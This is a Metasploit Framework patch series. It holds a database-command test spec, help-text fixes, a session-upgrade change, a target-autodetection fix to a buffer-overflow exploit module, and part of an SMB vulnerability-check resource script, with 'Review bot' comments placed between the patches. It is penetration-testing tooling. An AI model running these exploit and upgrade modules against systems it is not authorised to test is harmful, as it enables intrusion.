@@ -0,0 +1,389 @@ +require 'spec_helper' + +require 'msf/ui' +require 'msf/ui/console/command_dispatcher/db' + +RSpec.describe Msf::Ui::Console::CommandDispatcher::Db do + include_context 'Msf::DBManager' + include_context 'Msf::UIDriver' + + subject(:db) do + described_class.new(driver) + end + + it { is_expected.to respond_to :active? } + it { is_expected.to respond_to :arg_host_range } + it { is_expected.to respond_to :arg_port_range } + it { is_expected.to respond_to :cmd_db_autopwn } + it { is_expected.to respond_to :cmd_db_autopwn_help } + it { is_expected.to respond_to :cmd_db_connect } + it { is_expected.to respond_to :cmd_db_connect_help } + it { is_expected.to respond_to :cmd_db_disconnect } + it { is_expected.to respond_to :cmd_db_disconnect_help } + it { is_expected.to respond_to :cmd_db_driver } + it { is_expected.to respond_to :cmd_db_driver_help } + it { is_expected.to respond_to :cmd_db_export_help } + it { is_expected.to respond_to :cmd_db_hosts_help } + it { is_expected.to respond_to :cmd_db_import_help } + it { is_expected.to respond_to :cmd_db_import_tabs } + it { is_expected.to respond_to :cmd_db_nmap } + it { is_expected.to respond_to :cmd_db_notes } + it { is_expected.to respond_to :cmd_db_notes_help } + it { is_expected.to respond_to :cmd_db_rebuild_cache } + it { is_expected.to respond_to :cmd_db_rebuild_cache_help } + it { is_expected.to respond_to :cmd_db_services } + it { is_expected.to respond_to :cmd_db_services_help } + it { is_expected.to respond_to :cmd_db_status } + it { is_expected.to respond_to :cmd_db_vulns } + it { is_expected.to respond_to :cmd_db_vulns_help } + it { is_expected.to respond_to :cmd_hosts } + it { is_expected.to respond_to :cmd_hosts_help } + it { is_expected.to respond_to :cmd_loot_help } + it { is_expected.to respond_to :cmd_notes_help } + it { is_expected.to respond_to :cmd_services_help } + it { is_expected.to respond_to :cmd_vulns_help } + it { is_expected.to respond_to :cmd_workspace_help } + it { 
is_expected.to respond_to :cmd_workspace_tabs } + it { is_expected.to respond_to :commands } + it { is_expected.to respond_to :db_check_driver } + it { is_expected.to respond_to :db_connect_postgresql } + it { is_expected.to respond_to :db_find_tools } + it { is_expected.to respond_to :db_parse_db_uri_postgresql } + it { is_expected.to respond_to :deprecated_commands } + it { is_expected.to respond_to :each_host_range_chunk } + it { is_expected.to respond_to :make_sortable } + it { is_expected.to respond_to :name } + it { is_expected.to respond_to :set_rhosts_from_addrs } + + describe "#cmd_db_export" do + describe "-h" do + it "should show a help message" do + db.cmd_db_export "-h" + expect(@output).to match_array [ + "Usage:", + " db_export -f [filename]", + " Format can be one of: xml, pwdump" + ] + end + end + end + + describe "#cmd_db_import" do + describe "-h" do + it "should show a help message" do + db.cmd_db_import "-h" + expect(@output).to match_array [ + "Usage: db_import [file2...]", + "Filenames can be globs like *.xml, or **/*.xml which will search recursively", + "Currently supported file types include:", + " Acunetix", + " Amap Log", + " Amap Log -m", + " Appscan", + " Burp Issue XML", + " Burp Session XML", + " CI", + " Foundstone", + " FusionVM XML", + " IP Address List", + " IP360 ASPL", + " IP360 XML v3", + " Libpcap Packet Capture", + " Masscan XML", + " Metasploit PWDump Export", + " Metasploit XML", + " Metasploit Zip Export", + " Microsoft Baseline Security Analyzer", + " NeXpose Simple XML", + " NeXpose XML Report", + " Nessus NBE Report", + " Nessus XML (v1)", + " Nessus XML (v2)", + " NetSparker XML", + " Nikto XML", + " Nmap XML", + " OpenVAS Report", + " OpenVAS XML", + " Outpost24 XML", + " Qualys Asset XML", + " Qualys Scan XML", + " Retina XML", + " Spiceworks CSV Export", + " Wapiti XML" + ] + end + end + end + + describe "#cmd_hosts" do + describe "-h" do + it "should show a help message" do + db.cmd_hosts "-h" + expect(@output).to 
match_array [ + "Usage: hosts [ options ] [addr1 addr2 ...]", + "OPTIONS:", + " -a,--add Add the hosts instead of searching", + " -d,--delete Delete the hosts instead of searching", + " -c Only show the given columns (see list below)", + " -C Only show the given columns until the next restart (see list below)", + " -h,--help Show this help information", + " -u,--up Only show hosts which are up", + " -o Send output to a file in csv format", + " -O Order rows by specified column number", + " -R,--rhosts Set RHOSTS from the results of the search", + " -S,--search Search string to filter by", + " -i,--info Change the info of a host", + " -n,--name Change the name of a host", + " -m,--comment Change the comment of a host", + " -t,--tag Add or specify a tag to a range of hosts", + "Available columns: address, arch, comm, comments, created_at, cred_count, detected_arch, exploit_attempt_count, host_detail_count, info, mac, name, note_count, os_family, os_flavor, os_lang, os_name, os_sp, purpose, scope, service_count, state, updated_at, virtual_host, vuln_count, tags" + ] + end + end + end + + describe "#cmd_loot" do + describe "-h" do + it "should show a help message" do + db.cmd_loot "-h" + expect(@output).to match_array [ + "Usage: loot ", + " Info: loot [-h] [addr1 addr2 ...] [-t ]", + " Add: loot -f [fname] -i [info] -a [addr1 addr2 ...] 
-t [type]", + " Del: loot -d [addr1 addr2 ...]", + " -a,--add Add loot to the list of addresses, instead of listing", + " -d,--delete Delete *all* loot matching host and type", + " -f,--file File with contents of the loot to add", + " -i,--info Info of the loot to add", + " -t Search for a list of types", + " -h,--help Show this help information", + " -S,--search Search string to filter by" + ] + end + end + + end + + describe "#cmd_notes" do + describe "-h" do + it "should show a help message" do + db.cmd_notes "-h" + expect(@output).to match_array [ + "Usage: notes [-h] [-t ] [-n ] [-a] [addr range]", + " -a,--add Add a note to the list of addresses, instead of listing", + " -d,--delete Delete the hosts instead of searching", + " -n,--note Set the data for a new note (only with -a)", + " -t Search for a list of types", + " -h,--help Show this help information", + " -R,--rhosts Set RHOSTS from the results of the search", + " -S,--search Regular expression to match for search", + " -o,--output Save the notes to a csv file", + " --sort Fields to sort by (case sensitive)", + "Examples:", + " notes --add -t apps -n 'winzip' 10.1.1.34 10.1.20.41", + " notes -t smb.fingerprint 10.1.1.34 10.1.20.41", + " notes -S 'nmap.nse.(http|rtsp)' --sort type,output" + ] + + end + end + + end + + describe "#cmd_services" do + describe "-h" do + it "should show a help message" do + db.cmd_services "-h" + expect(@output).to match_array [ + "Usage: services [-h] [-u] [-a] [-r ] [-p ] [-s ] [-o ] [addr1 addr2 ...]", + " -a,--add Add the services instead of searching", + " -d,--delete Delete the services instead of searching", + " -c Only show the given columns", + " -h,--help Show this help information", + " -s Search for a list of service names", + " -p Search for a list of ports", + " -r Only show [tcp|udp] services", + " -u,--up Only show services which are up", + " -o Send output to a file in csv format", + " -O Order rows by specified column number", + " -R,--rhosts Set RHOSTS from 
the results of the search", + " -S,--search Search string to filter by", + "Available columns: created_at, info, name, port, proto, state, updated_at" + ] + end + end + describe "-p" do + before(:example) do + host = FactoryGirl.create(:mdm_host, :workspace => framework.db.workspace, :address => "192.168.0.1") + FactoryGirl.create(:mdm_service, :host => host, :port => 1024, name: 'Service1', proto: 'udp') + FactoryGirl.create(:mdm_service, :host => host, :port => 1025, name: 'Service2', proto: 'tcp') + FactoryGirl.create(:mdm_service, :host => host, :port => 1026, name: 'Service3', proto: 'udp') + end + it "should list services that are on a given port" do + db.cmd_services "-p", "1024,1025" + expect(@output).to match_array [ + "Services", + "========", + "", + "host port proto name state info", + "---- ---- ----- ---- ----- ----", + "192.168.0.1 1024 udp Service1 open ", + "192.168.0.1 1025 tcp Service2 open " + ] + end + end + describe "-np" do + before(:example) do + host = FactoryGirl.create(:mdm_host, :workspace => framework.db.workspace, :address => "192.168.0.1") + FactoryGirl.create(:mdm_service, :host => host, :port => 1024) + FactoryGirl.create(:mdm_service, :host => host, :port => 1025) + FactoryGirl.create(:mdm_service, :host => host, :port => 1026) + end + it "should list services that are not on a given port" do + skip { + db.cmd_services "-np", "1024" + + expect(@output).to =~ [ + "Services", + "========", + "", + "host port proto name state info", + "---- ---- ----- ---- ----- ----", + "192.168.0.1 1025 snmp open ", + "192.168.0.1 1026 snmp open " + ] + } + end + end + end + + describe "#cmd_vulns" do + describe "-h" do + it "should show a help message" do + db.cmd_vulns "-h" + expect(@output).to match_array [ + "Print all vulnerabilities in the database", + "Usage: vulns [addr range]", + " -h,--help Show this help information", + " -p,--port List vulns matching this port spec", + " -s List vulns matching these service names", + " -R,--rhosts Set 
RHOSTS from the results of the search", + " -S,--search Search string to filter by", + " -i,--info Display Vuln Info", + "Examples:", + " vulns -p 1-65536 # only vulns with associated services", + " vulns -p 1-65536 -s http # identified as http on any port" + ] + end + end + + end + + describe "#cmd_workspace" do + before(:example) do + db.cmd_workspace "-D" + @output = [] + end + + describe "" do + it "should list default workspace" do + db.cmd_workspace + expect(@output).to match_array [ + "%red* default%clr" + ] + end + + it "should list all workspaces" do + db.cmd_workspace("-a", "foo") + @output = [] + db.cmd_workspace + expect(@output).to match_array [ + " default", + "%red* foo%clr" + ] + end + end + + describe "-v" do + it "should list default workspace verbosely" do + db.cmd_workspace("-v") + expect(@output).to match_array [ + "", + "Workspaces", + "==========", + "current name hosts services vulns creds loots notes", + "------- ---- ----- -------- ----- ----- ----- -----", + "* default 0 0 0 0 0 0" + ] + end + + it "should list all workspaces verbosely" do + db.cmd_workspace("-a", "foo") + @output = [] + db.cmd_workspace("-v") + expect(@output).to match_array [ + "", + "Workspaces", + "==========", + "current name hosts services vulns creds loots notes", + "------- ---- ----- -------- ----- ----- ----- -----", + " default 0 0 0 0 0 0", + "* foo 0 0 0 0 0 0" + ] + end + end + + describe "-a" do + it "should add workspaces" do + db.cmd_workspace("-a", "foo", "bar", "baf") + expect(@output).to match_array [ + "Added workspace: foo", + "Added workspace: bar", + "Added workspace: baf" + ] + end + end + + describe "-d" do + it "should delete a workspace" do + db.cmd_workspace("-a", "foo") + @output = [] + db.cmd_workspace("-d", "foo") + expect(@output).to match_array [ + "Deleted workspace: foo", + "Switched workspace: default" + ] + end + end + + describe "-D" do + it "should delete all workspaces" do + db.cmd_workspace("-a", "foo") + @output = [] + 
db.cmd_workspace("-D") + expect(@output).to match_array [ + "Deleted and recreated the default workspace", + "Deleted workspace: foo", + "Switched workspace: default" + ] + end + end + + describe "-h" do + it "should show a help message" do + db.cmd_workspace "-h" + expect(@output).to match_array [ + "Usage:", + " workspace List workspaces", + " workspace -v List workspaces verbosely", + " workspace [name] Switch workspace", + " workspace -a [name] ... Add workspace(s)", + " workspace -d [name] ... Delete workspace(s)", + " workspace -D Delete all workspaces", + " workspace -r Rename workspace", + " workspace -h Show this help information" + ] + end + end + end +end From ecada96585066f0e74f7ef3c7b24455863e85611 Mon Sep 17 00:00:00 2001 From: Dave Farrow Date: Fri, 20 Oct 2017 21:20:36 -0700 Subject: [PATCH 032/254] #9108: fixed unit test --- spec/lib/msf/ui/console/command_dispatcher/db_spec.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb b/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb index d62f208a17..7bccc9b9cc 100644 --- a/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb +++ b/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb @@ -125,6 +125,7 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Db do " -a,--add Add the hosts instead of searching", " -d,--delete Delete the hosts instead of searching", " -c Only show the given columns (see list below)", + " -C Only show the given columns until the next restart (see list below)", " -h,--help Show this help information", " -u,--up Only show hosts which are up", " -o Send output to a file in csv format", From afe067fca54cf35f8585cf7bf99657ebd7955985 Mon Sep 17 00:00:00 2001 From: Dave Farrow Date: Fri, 20 Oct 2017 21:22:31 -0700 Subject: [PATCH 033/254] commited file to the wrong place --- db_spec.rb | 389 ----------------------------------------------------- 1 file changed, 389 deletions(-) delete mode 100644 db_spec.rb 
diff --git a/db_spec.rb b/db_spec.rb deleted file mode 100644 index 7bccc9b9cc..0000000000 --- a/db_spec.rb +++ /dev/null 
@@ -1,389 +0,0 @@ -require 'spec_helper' - -require 'msf/ui' -require 'msf/ui/console/command_dispatcher/db' - -RSpec.describe Msf::Ui::Console::CommandDispatcher::Db do - include_context 'Msf::DBManager' - include_context 'Msf::UIDriver' - - subject(:db) do - described_class.new(driver) - end - - it { is_expected.to respond_to :active? } - it { is_expected.to respond_to :arg_host_range } - it { is_expected.to respond_to :arg_port_range } - it { is_expected.to respond_to :cmd_db_autopwn } - it { is_expected.to respond_to :cmd_db_autopwn_help } - it { is_expected.to respond_to :cmd_db_connect } - it { is_expected.to respond_to :cmd_db_connect_help } - it { is_expected.to respond_to :cmd_db_disconnect } - it { is_expected.to respond_to :cmd_db_disconnect_help } - it { is_expected.to respond_to :cmd_db_driver } - it { is_expected.to respond_to :cmd_db_driver_help } - it { is_expected.to respond_to :cmd_db_export_help } - it { is_expected.to respond_to :cmd_db_hosts_help } - it { is_expected.to respond_to :cmd_db_import_help } - it { is_expected.to respond_to :cmd_db_import_tabs } - it { is_expected.to respond_to :cmd_db_nmap } - it { is_expected.to respond_to :cmd_db_notes } - it { is_expected.to respond_to :cmd_db_notes_help } - it { is_expected.to respond_to :cmd_db_rebuild_cache } - it { is_expected.to respond_to :cmd_db_rebuild_cache_help } - it { is_expected.to respond_to :cmd_db_services } - it { is_expected.to respond_to :cmd_db_services_help } - it { is_expected.to respond_to :cmd_db_status } - it { is_expected.to respond_to :cmd_db_vulns } - it { is_expected.to respond_to :cmd_db_vulns_help } - it { is_expected.to respond_to :cmd_hosts } - it { is_expected.to respond_to :cmd_hosts_help } - it { is_expected.to respond_to :cmd_loot_help } - it { is_expected.to respond_to :cmd_notes_help } - it { is_expected.to respond_to :cmd_services_help } - it { is_expected.to respond_to :cmd_vulns_help } - it { is_expected.to respond_to :cmd_workspace_help } - it { 
is_expected.to respond_to :cmd_workspace_tabs } - it { is_expected.to respond_to :commands } - it { is_expected.to respond_to :db_check_driver } - it { is_expected.to respond_to :db_connect_postgresql } - it { is_expected.to respond_to :db_find_tools } - it { is_expected.to respond_to :db_parse_db_uri_postgresql } - it { is_expected.to respond_to :deprecated_commands } - it { is_expected.to respond_to :each_host_range_chunk } - it { is_expected.to respond_to :make_sortable } - it { is_expected.to respond_to :name } - it { is_expected.to respond_to :set_rhosts_from_addrs } - - describe "#cmd_db_export" do - describe "-h" do - it "should show a help message" do - db.cmd_db_export "-h" - expect(@output).to match_array [ - "Usage:", - " db_export -f [filename]", - " Format can be one of: xml, pwdump" - ] - end - end - end - - describe "#cmd_db_import" do - describe "-h" do - it "should show a help message" do - db.cmd_db_import "-h" - expect(@output).to match_array [ - "Usage: db_import [file2...]", - "Filenames can be globs like *.xml, or **/*.xml which will search recursively", - "Currently supported file types include:", - " Acunetix", - " Amap Log", - " Amap Log -m", - " Appscan", - " Burp Issue XML", - " Burp Session XML", - " CI", - " Foundstone", - " FusionVM XML", - " IP Address List", - " IP360 ASPL", - " IP360 XML v3", - " Libpcap Packet Capture", - " Masscan XML", - " Metasploit PWDump Export", - " Metasploit XML", - " Metasploit Zip Export", - " Microsoft Baseline Security Analyzer", - " NeXpose Simple XML", - " NeXpose XML Report", - " Nessus NBE Report", - " Nessus XML (v1)", - " Nessus XML (v2)", - " NetSparker XML", - " Nikto XML", - " Nmap XML", - " OpenVAS Report", - " OpenVAS XML", - " Outpost24 XML", - " Qualys Asset XML", - " Qualys Scan XML", - " Retina XML", - " Spiceworks CSV Export", - " Wapiti XML" - ] - end - end - end - - describe "#cmd_hosts" do - describe "-h" do - it "should show a help message" do - db.cmd_hosts "-h" - expect(@output).to 
match_array [ - "Usage: hosts [ options ] [addr1 addr2 ...]", - "OPTIONS:", - " -a,--add Add the hosts instead of searching", - " -d,--delete Delete the hosts instead of searching", - " -c Only show the given columns (see list below)", - " -C Only show the given columns until the next restart (see list below)", - " -h,--help Show this help information", - " -u,--up Only show hosts which are up", - " -o Send output to a file in csv format", - " -O Order rows by specified column number", - " -R,--rhosts Set RHOSTS from the results of the search", - " -S,--search Search string to filter by", - " -i,--info Change the info of a host", - " -n,--name Change the name of a host", - " -m,--comment Change the comment of a host", - " -t,--tag Add or specify a tag to a range of hosts", - "Available columns: address, arch, comm, comments, created_at, cred_count, detected_arch, exploit_attempt_count, host_detail_count, info, mac, name, note_count, os_family, os_flavor, os_lang, os_name, os_sp, purpose, scope, service_count, state, updated_at, virtual_host, vuln_count, tags" - ] - end - end - end - - describe "#cmd_loot" do - describe "-h" do - it "should show a help message" do - db.cmd_loot "-h" - expect(@output).to match_array [ - "Usage: loot ", - " Info: loot [-h] [addr1 addr2 ...] [-t ]", - " Add: loot -f [fname] -i [info] -a [addr1 addr2 ...] 
-t [type]", - " Del: loot -d [addr1 addr2 ...]", - " -a,--add Add loot to the list of addresses, instead of listing", - " -d,--delete Delete *all* loot matching host and type", - " -f,--file File with contents of the loot to add", - " -i,--info Info of the loot to add", - " -t Search for a list of types", - " -h,--help Show this help information", - " -S,--search Search string to filter by" - ] - end - end - - end - - describe "#cmd_notes" do - describe "-h" do - it "should show a help message" do - db.cmd_notes "-h" - expect(@output).to match_array [ - "Usage: notes [-h] [-t ] [-n ] [-a] [addr range]", - " -a,--add Add a note to the list of addresses, instead of listing", - " -d,--delete Delete the hosts instead of searching", - " -n,--note Set the data for a new note (only with -a)", - " -t Search for a list of types", - " -h,--help Show this help information", - " -R,--rhosts Set RHOSTS from the results of the search", - " -S,--search Regular expression to match for search", - " -o,--output Save the notes to a csv file", - " --sort Fields to sort by (case sensitive)", - "Examples:", - " notes --add -t apps -n 'winzip' 10.1.1.34 10.1.20.41", - " notes -t smb.fingerprint 10.1.1.34 10.1.20.41", - " notes -S 'nmap.nse.(http|rtsp)' --sort type,output" - ] - - end - end - - end - - describe "#cmd_services" do - describe "-h" do - it "should show a help message" do - db.cmd_services "-h" - expect(@output).to match_array [ - "Usage: services [-h] [-u] [-a] [-r ] [-p ] [-s ] [-o ] [addr1 addr2 ...]", - " -a,--add Add the services instead of searching", - " -d,--delete Delete the services instead of searching", - " -c Only show the given columns", - " -h,--help Show this help information", - " -s Search for a list of service names", - " -p Search for a list of ports", - " -r Only show [tcp|udp] services", - " -u,--up Only show services which are up", - " -o Send output to a file in csv format", - " -O Order rows by specified column number", - " -R,--rhosts Set RHOSTS from 
the results of the search", - " -S,--search Search string to filter by", - "Available columns: created_at, info, name, port, proto, state, updated_at" - ] - end - end - describe "-p" do - before(:example) do - host = FactoryGirl.create(:mdm_host, :workspace => framework.db.workspace, :address => "192.168.0.1") - FactoryGirl.create(:mdm_service, :host => host, :port => 1024, name: 'Service1', proto: 'udp') - FactoryGirl.create(:mdm_service, :host => host, :port => 1025, name: 'Service2', proto: 'tcp') - FactoryGirl.create(:mdm_service, :host => host, :port => 1026, name: 'Service3', proto: 'udp') - end - it "should list services that are on a given port" do - db.cmd_services "-p", "1024,1025" - expect(@output).to match_array [ - "Services", - "========", - "", - "host port proto name state info", - "---- ---- ----- ---- ----- ----", - "192.168.0.1 1024 udp Service1 open ", - "192.168.0.1 1025 tcp Service2 open " - ] - end - end - describe "-np" do - before(:example) do - host = FactoryGirl.create(:mdm_host, :workspace => framework.db.workspace, :address => "192.168.0.1") - FactoryGirl.create(:mdm_service, :host => host, :port => 1024) - FactoryGirl.create(:mdm_service, :host => host, :port => 1025) - FactoryGirl.create(:mdm_service, :host => host, :port => 1026) - end - it "should list services that are not on a given port" do - skip { - db.cmd_services "-np", "1024" - - expect(@output).to =~ [ - "Services", - "========", - "", - "host port proto name state info", - "---- ---- ----- ---- ----- ----", - "192.168.0.1 1025 snmp open ", - "192.168.0.1 1026 snmp open " - ] - } - end - end - end - - describe "#cmd_vulns" do - describe "-h" do - it "should show a help message" do - db.cmd_vulns "-h" - expect(@output).to match_array [ - "Print all vulnerabilities in the database", - "Usage: vulns [addr range]", - " -h,--help Show this help information", - " -p,--port List vulns matching this port spec", - " -s List vulns matching these service names", - " -R,--rhosts Set 
RHOSTS from the results of the search", - " -S,--search Search string to filter by", - " -i,--info Display Vuln Info", - "Examples:", - " vulns -p 1-65536 # only vulns with associated services", - " vulns -p 1-65536 -s http # identified as http on any port" - ] - end - end - - end - - describe "#cmd_workspace" do - before(:example) do - db.cmd_workspace "-D" - @output = [] - end - - describe "" do - it "should list default workspace" do - db.cmd_workspace - expect(@output).to match_array [ - "%red* default%clr" - ] - end - - it "should list all workspaces" do - db.cmd_workspace("-a", "foo") - @output = [] - db.cmd_workspace - expect(@output).to match_array [ - " default", - "%red* foo%clr" - ] - end - end - - describe "-v" do - it "should list default workspace verbosely" do - db.cmd_workspace("-v") - expect(@output).to match_array [ - "", - "Workspaces", - "==========", - "current name hosts services vulns creds loots notes", - "------- ---- ----- -------- ----- ----- ----- -----", - "* default 0 0 0 0 0 0" - ] - end - - it "should list all workspaces verbosely" do - db.cmd_workspace("-a", "foo") - @output = [] - db.cmd_workspace("-v") - expect(@output).to match_array [ - "", - "Workspaces", - "==========", - "current name hosts services vulns creds loots notes", - "------- ---- ----- -------- ----- ----- ----- -----", - " default 0 0 0 0 0 0", - "* foo 0 0 0 0 0 0" - ] - end - end - - describe "-a" do - it "should add workspaces" do - db.cmd_workspace("-a", "foo", "bar", "baf") - expect(@output).to match_array [ - "Added workspace: foo", - "Added workspace: bar", - "Added workspace: baf" - ] - end - end - - describe "-d" do - it "should delete a workspace" do - db.cmd_workspace("-a", "foo") - @output = [] - db.cmd_workspace("-d", "foo") - expect(@output).to match_array [ - "Deleted workspace: foo", - "Switched workspace: default" - ] - end - end - - describe "-D" do - it "should delete all workspaces" do - db.cmd_workspace("-a", "foo") - @output = [] - 
db.cmd_workspace("-D") - expect(@output).to match_array [ - "Deleted and recreated the default workspace", - "Deleted workspace: foo", - "Switched workspace: default" - ] - end - end - - describe "-h" do - it "should show a help message" do - db.cmd_workspace "-h" - expect(@output).to match_array [ - "Usage:", - " workspace List workspaces", - " workspace -v List workspaces verbosely", - " workspace [name] Switch workspace", - " workspace -a [name] ... Add workspace(s)", - " workspace -d [name] ... Delete workspace(s)", - " workspace -D Delete all workspaces", - " workspace -r Rename workspace", - " workspace -h Show this help information" - ] - end - end - end -end From 636551aa03e4f1490b8633659c76ed69571e6483 Mon Sep 17 00:00:00 2001 From: Dave Farrow Date: Fri, 20 Oct 2017 21:32:54 -0700 Subject: [PATCH 034/254] Fixed help message to match test --- lib/msf/ui/console/command_dispatcher/db.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index 74f2cf3f17..f642d096da 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -432,7 +432,7 @@ class Db print_line " -a,--add Add the hosts instead of searching" print_line " -d,--delete Delete the hosts instead of searching" print_line " -c Only show the given columns (see list below)" - print_line " -C Only show the given columns until next restart (see list below)" + print_line " -C Only show the given columns until the next restart (see list below)" print_line " -h,--help Show this help information" print_line " -u,--up Only show hosts which are up" print_line " -o Send output to a file in csv format" From ca4feb51364d0b1051e5548d949bff3f361a30bf Mon Sep 17 00:00:00 2001 
From: Tim Date: Tue, 5 Sep 2017 23:52:38 +0800 Subject: [PATCH 035/254] fix session upgrading --- lib/msf/ui/console/command_dispatcher/core.rb | 11 +++-------- modules/post/multi/manage/shell_to_meterpreter.rb | 5 ----- 2 files changed, 3 insertions(+), 13 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 0cbc9416f5..675538ae61 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -1443,14 +1443,9 @@ class Core session.response_timeout = response_timeout end begin - if ['shell', 'powershell'].include?(session.type) - session.init_ui(driver.input, driver.output) - session.execute_script('post/multi/manage/shell_to_meterpreter') - session.reset_ui - else - print_error("Session #{sess_id} is not a command shell session, it is #{session.type}, skipping...") - next - end + session.init_ui(driver.input, driver.output) + session.execute_script('post/multi/manage/shell_to_meterpreter') + session.reset_ui ensure if session.respond_to?(:response_timeout) && last_known_timeout session.response_timeout = last_known_timeout diff --git a/modules/post/multi/manage/shell_to_meterpreter.rb b/modules/post/multi/manage/shell_to_meterpreter.rb index fd865392db..1a69f54bd7 100644 --- a/modules/post/multi/manage/shell_to_meterpreter.rb +++ b/modules/post/multi/manage/shell_to_meterpreter.rb @@ -52,11 +52,6 @@ class MetasploitModule < Msf::Post def run print_status("Upgrading session ID: #{datastore['SESSION']}") - if session.type =~ /meterpreter/ - print_error("Shell is already Meterpreter.") - return nil - end - # Try hard to find a valid LHOST value in order to # make running 'sessions -u' as robust as possible. if datastore['LHOST'] From df14dc4452f02a14cb180a5b67ce26bb185e2d14 Mon Sep 17 00:00:00 2001 
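Review bot: With the `['shell', 'powershell'].include?(session.type)` guard removed in core.rb, and the module's own "Shell is already Meterpreter." check removed in the second hunk of this commit, nothing visible in either hunk rejects a meterpreter (or any other non-shell) session before `post/multi/manage/shell_to_meterpreter` is executed against it. Unless the post module's compatibility metadata enforces session types elsewhere (not visible here), `sessions -u` on a meterpreter session id will now run the upgrade instead of being skipped. If the old allow-list was simply too narrow, keep a narrower deny-list with a message rather than no check: `if session.type =~ /meterpreter/` / `print_error("Session #{sess_id} is already Meterpreter, skipping...")` / `next`. The enclosing method in core.rb starts and ends outside this hunk, as does `run` in the module hunk.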
From: Maurice Popp Date: Mon, 23 Oct 2017 09:07:46 +0200 Subject: [PATCH 036/254] autodetection fixing --- modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb b/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb index e93adff0a2..2af58a12f4 100644 --- a/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb +++ b/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb @@ -227,7 +227,7 @@ class MetasploitModule < Msf::Exploit::Remote def exploit if target['auto'] - checkcode, self.target = fingerprint + checkcode, target = fingerprint fail_with(Failure::NotVulnerable, 'No vulnerable Version detected - exploit aborted.') if checkcode.to_s.include? 'unknown' target_rop, target_overwrite, target_stack_align = ropchain(target) else From d8b2e7a13deb68d201de98f390e155d7f1a80658 Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Tue, 24 Oct 2017 09:19:02 -0700 Subject: [PATCH 037/254] Add resource scripts to check & verify common SMB vulnerabilities This adds two resource scripts in order to check and verify common SMB vuns that Metasploit can do: * smb_checks.rc * smb_validate.rc --- scripts/resource/smb_checks.rc | 108 +++++++++++++++++++++ scripts/resource/smb_validate.rc | 157 +++++++++++++++++++++++++++++++ 2 files changed, 265 insertions(+) create mode 100644 scripts/resource/smb_checks.rc create mode 100644 scripts/resource/smb_validate.rc diff --git a/scripts/resource/smb_checks.rc b/scripts/resource/smb_checks.rc new file mode 100644 index 0000000000..ab2276f517 --- /dev/null +++ b/scripts/resource/smb_checks.rc 
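Review bot: `checkcode, target = fingerprint` introduces a local variable named `target`, and in Ruby a local is in scope for everything lexically after its assignment in the method, including the `else` branch that follows this hunk, where `target` then resolves to the never-assigned local (nil) instead of the module's `target` accessor. If that `else` branch (outside the hunk) calls `ropchain(target)` or reads `target['Arch']` for a manually selected target, it will now operate on nil. Give the auto-detected target a distinct name and use it in both branches: `checkcode, mytarget = fingerprint` and `target_rop, target_overwrite, target_stack_align = ropchain(mytarget)`, with `mytarget = target` in the `else` branch. Note also that a local does not update the target the framework uses for payload generation, so anything outside `exploit` that depends on the selected target still sees "Automatic Targeting"; `exploit` continues past the end of the hunk.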
@@ -0,0 +1,108 @@ + + +# +# This resource scripts will check common security concerns on SMB for Windows. +# Specifically, this script will check for these things: +# +# * MS08-067. +# * MS17-010. +# * SMB version 1. +# +# For extra validation, you may try the smb_validate.rc script. +# +# Author: +# sinn3r +# + +@job_ids = [] + +def wait_until_jobs_done + while true + @job_ids.each do |job_id| + current_job_ids = framework.jobs.keys.map { |e| e.to_i } + sleep 1 if current_job_ids.include?(job_id) + end + + return + end +end + +def check_ms17_010(host, serv) + print_status("Checking MS17-010 on #{host.address}") + mod = framework.modules.create('auxiliary/scanner/smb/smb_ms17_010') + mod.datastore['RHOSTS'] = host.address + mod.datastore['RPORT'] = serv.port + mod.run_simple({ 'RunAsJob' => true, 'LocalOutput' => self.output }) + print_status("MS17-010 job ID for target #{host.address} is: #{mod.job_id}") + @job_ids << mod.job_id +end + +def check_ms08_067_netapi(host, serv) + print_status("Checking MS08-067 on #{host.address}") + mod = framework.exploits.create('windows/smb/ms08_067_netapi') + mod.datastore['RHOST'] = host.address + begin + check_code = mod.check_simple({ 'RunAsJob' => true, 'LocalOutput' => self.output }) + if mod.job_id + print_status("MS08-067 job ID for target #{host.address} is: #{mod.job_id}") + @job_ids << mod.job_id + end + + if check_code == Msf::Exploit::CheckCode::Vulnerable + framework.db.report_vuln( + workspace: mod.workspace, + host: mod.rhost, + name: mod.name, + info: "This was flagged as vulnerable by the explicit check of #{mod.fullname}.", + refs: mod.references + ) + end + rescue ::Exception => e + print_error(e.message) + end +end + +def check_smbv1(host, serv) + print_status("Checking SMBv1 on #{host.address}") + mod = framework.modules.create('auxiliary/scanner/smb/smb1') + mod.datastore['RHOSTS'] = host.address + mod.datastore['RPORT'] = serv.port + mod.run_simple({ 'RunAsJob' => true, 'LocalOutput' => self.output }) + 
